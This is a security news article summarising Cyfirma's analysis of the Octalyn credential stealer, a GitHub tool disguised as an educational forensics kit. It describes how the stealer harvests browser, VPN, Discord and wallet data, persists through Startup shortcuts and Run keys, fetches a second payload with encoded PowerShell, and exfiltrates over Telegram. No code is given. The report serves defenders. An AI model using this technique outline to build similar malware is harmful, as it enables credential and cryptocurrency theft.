Warning: “Educational” Octalyn Forensic Toolkit is a Dangerous Telegram-Controlled Credential Stealer

Researchers at Cyfirma have uncovered a disturbing example of how a so-called “educational” tool can cross the line into full-blown malware. Publicly hosted on GitHub, the Octalyn Forensic Toolkit is masquerading as a digital forensics utility but is, in reality, a modular credential stealer engineered for persistent data theft, silent execution, and Telegram-based command-and-control.

“Despite its claimed educational intent, the toolkit functions as a full-fledged credential stealer,” Cyfirma states, emphasizing that even low-skilled actors can wield it with ease.

Octalyn is made up of two key components:

• A Delphi-based builder with a friendly GUI for generating payloads
• A C++-written executable that acts as the actual stealer

To generate a malicious payload, an attacker simply enters a Telegram bot token and chat ID, enabling real-time data exfiltration via Telegram. From there, the malware:

• Silently extracts credentials from browsers, VPNs, Discord, Telegram, and gaming accounts
• Hunts for cryptocurrency wallets, capturing everything from private keys to wallet.dat files
• Establishes persistence using Startup folder shortcuts and registry Run keys
• Compresses stolen data and transmits it over encrypted channels to Telegram

Once deployed, Octalyn searches for common Chromium-based browser files and decrypts stored cookies, passwords, and autofill data. It even extracts bookmarks and browsing history to help attackers profile victims.

“All stolen credentials and system information are stored in an organized directory structure… Crypto wallets, VPN, Browsers, Discord, and others.”

In its pursuit of financial data, Octalyn scans for wallets related to Bitcoin, Ethereum, Litecoin, Monero, and popular browser-based extensions like MetaMask and TronLink.

Each category is saved in a tidy subfolder, allowing attackers to quickly sort through and exploit the exfiltrated content.

Octalyn goes to great lengths to avoid detection and ensure longevity on a system:

• Startup folder persistence: Installs rvn.exe in the user’s Startup path
• Registry persistence: Adds itself to the HKCU\Run registry key
• Silent operation: Uses ShellExecuteA with SW_HIDE to remain invisible to the user
• Secondary payload delivery: Employs Base64-encoded PowerShell to fetch additional malware from GitHub

“The malware then constructs and executes a Base64-encoded PowerShell script… written in UTF-16LE format,” Cyfirma notes, highlighting a rarely seen level of stealth and obfuscation.

At the time of analysis, the downloaded payload (winlogon.exe) wasn’t available, but the GitHub repository remained live, indicating future drops could be imminent.

Perhaps Octalyn’s most cunning feature is its use of Telegram as a command-and-control (C2) mechanism. This makes traffic analysis and detection much more difficult than with traditional HTTP-based malware.

“The malware establishes a secure connection over TLS to the Telegram API… transmitting a uniquely identifiable ZIP file name to indicate successful infection.”

These ZIPs, named using the victim’s username, contain the stolen data in a structured format that attackers can immediately exploit.

“Octalyn poses a serious threat if used outside controlled environments,” Cyfirma warns.

Related Posts:

• Sophisticated Social Engineering Campaign Linked to Black Basta Ransomware
• Lumma Stealer Malware Campaign Targets Educational Institutions with Deceptive PDF Lures
• Zero-Click iMessage Alert: Paragon’s Graphite Spyware Exploits iOS Flaw, Targets Journalists